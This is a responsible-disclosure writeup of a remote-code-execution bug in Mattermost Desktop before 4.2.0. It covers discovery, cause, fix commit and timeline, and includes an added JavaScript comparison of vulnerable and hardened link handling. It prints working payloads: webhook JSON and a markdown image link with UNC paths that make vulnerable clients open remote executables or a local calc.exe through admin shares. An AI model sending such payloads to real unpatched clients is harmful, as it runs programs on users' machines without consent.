DEV Community

Nathan Lowe

RCE in Mattermost Desktop earlier than 4.2.0

First things first, if you use Mattermost Desktop and aren't already on 4.2.0, you should update immediately.

What a way to end a Monday.

Discovery

Jeff Ziegener and Scott Payne first discovered this while trying to set the profile image of an integration to a UNC path. They noticed that when the integration posted a message, the image at the specified UNC path opened... in Windows Photo Viewer! After some further digging, we found this wasn't limited to photos. We could open any executable the user had access to on a remote share. We could also make users visit arbitrary web pages in their default browser by pointing the integration profile picture at a UNC path to a shortcut. For example, sending the following payload to an incoming webhook makes the Desktop app open tux.png in Windows Photo Viewer:

{
  "text": "Windows Photo Viewer",
  "username": "Windows Photo Viewer",
  "icon_url": "\\\\some-server\\some-share\\tux.png"
}

Investigation

Further digging showed that even though UNC paths to localhost / 127.0.0.1 were blocked, we could still open local executables if we knew the target user's machine name and they had administrative shares enabled. For example, if my machine name is win-01234, I could open a local instance of calc.exe by linking to \\win-01234\c$\windows\system32\calc.exe:

{
  "text": "Calculator!",
  "username": "calc.exe",
  "icon_url": "\\\\win-01234\\c$\\windows\\system32\\calc.exe"
}

Even better, every time the channel is re-rendered, every image link in it is opened again.

After reporting the bug to Mattermost, we discovered that we could reproduce it by simply sending a message containing a link or an image with a UNC path. Mattermost Desktop opens such a link with the default application when it is clicked, and opens image links automatically as soon as the channel is rendered. This means I can post the following message:

![](\\some-server-you-can-access\some-share\virus.exe)

And Mattermost Desktop will happily execute the program at that path!

Want to rick-roll everyone in a channel? Post an image link to a shortcut on a share everyone can access.

Details

Versions of the Desktop application prior to 4.2.0 contain a vulnerability in the way certain image links are handled. Given a profile picture or image link with a non-http protocol, if the host segment of the URL does not match the regular expression ^localhost$|^127\.0\.0\.1$|^\[::1\]$, the URL is passed straight to Electron's shell.openExternal(...), which the Electron documentation describes as:

Open the given external protocol URL in the desktop's default manner. (For example, mailto: URLs in the user's default mail agent).

This code path was removed in commit c86182.
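To make the check described above concrete, here is an added example (written for this page, not Mattermost's own code) that models the pre-4.2.0 decision as the writeup describes it beside a version that never hands a non-http(s) image link to the shell at all. The mapping of a bare UNC path to a host (with a made-up "unc:" pseudo-protocol), the decision labels and the sample links are assumptions constructed for the example; nothing is actually launched.

```javascript
'use strict';

// The host blocklist quoted in the writeup. It names loopback hosts only.
const LOOPBACK_HOST = /^localhost$|^127\.0\.0\.1$|^\[::1\]$/;

// Split a link into protocol and host. A bare UNC path (\\server\share\file)
// is modelled with protocol "unc:" and the server as host; that mapping is an
// assumption of this example, not Mattermost's own parsing. Everything else
// goes through the WHATWG URL parser, which throws on unparseable input.
function linkParts(link) {
  const unc = /^\\\\([^\\]+)\\(.+)$/.exec(link);
  if (unc) return { protocol: 'unc:', host: unc[1], path: unc[2] };
  const url = new URL(link);
  return { protocol: url.protocol, host: url.host, path: url.pathname };
}

// Pre-4.2.0 logic as the writeup describes it: http(s) images are rendered
// in-app; anything else is handed to shell.openExternal unless the host
// matches the loopback regex. 'openExternal' here stands for that call.
function decideVulnerable(link) {
  let parts;
  try { parts = linkParts(link); } catch { return 'block'; }
  if (parts.protocol === 'http:' || parts.protocol === 'https:') return 'render';
  return LOOPBACK_HOST.test(parts.host) ? 'block' : 'openExternal';
}

// Hardened decision (an assumed design, not the commit itself): non-http(s)
// image links never reach the shell, so the host check and every way around
// it (machine names, admin shares) become irrelevant.
function decideHardened(link) {
  let parts;
  try { parts = linkParts(link); } catch { return 'block'; }
  return (parts.protocol === 'http:' || parts.protocol === 'https:') ? 'render' : 'block';
}

// Constructed sample links, including the payloads from the writeup.
const SAMPLES = [
  'https://example.com/tux.png',
  '\\\\some-server\\some-share\\tux.png',
  '\\\\win-01234\\c$\\windows\\system32\\calc.exe',
  '\\\\localhost\\c$\\windows\\system32\\calc.exe',
  '\\\\127.0.0.1\\c$\\windows\\system32\\calc.exe',
  'file://win-01234/c$/windows/system32/calc.exe',
];

// Returns one row per link with both decisions, for comparison.
function compare(links = SAMPLES) {
  return links.map((link) => ({
    link,
    vulnerable: decideVulnerable(link),
    hardened: decideHardened(link),
  }));
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log('vulnerable   hardened link');
  for (const row of compare()) {
    console.log(`${row.vulnerable.padEnd(12)} ${row.hardened.padEnd(8)} ${row.link}`);
  }
}
```

Run it with node. The vulnerable column shows why a loopback blocklist is the wrong tool: only the two spellings of "this machine" are refused, so any other name that resolves back to the victim (the machine name in the admin-share payload above) sails through, while a remote share is never even considered suspicious. The hardened column is identical for every non-http(s) link, which is the property you want: the decision no longer depends on parsing the host at all.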

Disclosure Timeline

  • 2018-10-22: Issue initially discovered by Jeff Ziegener and Scott Payne at Hyland Software
  • 2018-10-23: Issue disclosed to Mattermost per the Responsible Disclosure Policy
  • 2018-10-24: Issue confirmed by Mattermost
  • 2018-10-28: Fix merged to master
  • 2018-11-27: Mattermost Desktop 4.2.0 released with the fix
  • 2019-01-02: Vulnerability details released by Mattermost
  • 2019-01-07: Writeup published
